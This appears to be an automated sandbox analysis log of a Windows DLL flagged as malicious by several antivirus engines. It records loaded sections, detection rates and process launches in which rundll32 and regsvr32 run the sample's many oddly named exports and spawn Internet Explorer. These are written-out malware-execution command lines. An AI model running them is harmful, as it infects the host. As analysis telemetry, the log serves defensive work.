                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: @ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ? .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: > .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: = .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: < .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ; .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: : .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 9 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 8 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 7 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 6 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 5 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 4 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 3 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 2 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 1 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: 0 .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: - .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: , .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: + .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: * .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ) .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ( .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: & .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: % .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: $ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: # .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ' .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ! .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ~ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: } .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: | .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: { .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: d .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: c .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: b .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: a .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ` .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: _ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ^ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: ] .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: [ .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: z .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: y .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: x .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: w .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: v .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: u .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: t .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: s .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: r .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: q .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: p .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: o .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: n .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: m .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: l .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: k .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: j .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: i .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: h .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: g .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: f .dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: e .dllJump to behavior
                      Source: qT9Qk5aKTk.dllStatic PE information: Number of sections : 12 > 10
                      Source: qT9Qk5aKTk.dllVirustotal: Detection: 80%
                      Source: qT9Qk5aKTk.dllMetadefender: Detection: 59%
                      Source: qT9Qk5aKTk.dllReversingLabs: Detection: 82%
                      Source: qT9Qk5aKTk.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Aquatically
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17410 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Episodically
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Kakapo
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Overdistantness
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Pseudopodal
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82962 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Microphage
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Cytost
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Reattach
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Vigia
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Preallable
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Amphistomous
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Americanistic
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 820
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Suprahumanity
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Eupyrchroite
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:17428 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Splitbeak
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 816
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2760 CREDAT:82974 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Andirin
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,Drail
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\qT9Qk5aKTk.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\qT9Qk5aKTk.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AquaticallyJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,EpisodicallyJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,KakapoJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,OverdistantnessJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,PseudopodalJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,MicrophageJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,CytostJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,ReattachJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,VigiaJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,PreallableJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AmphistomousJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,AmericanisticJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\qT9Qk5aKTk.dll,SuprahumanityJump to behavior
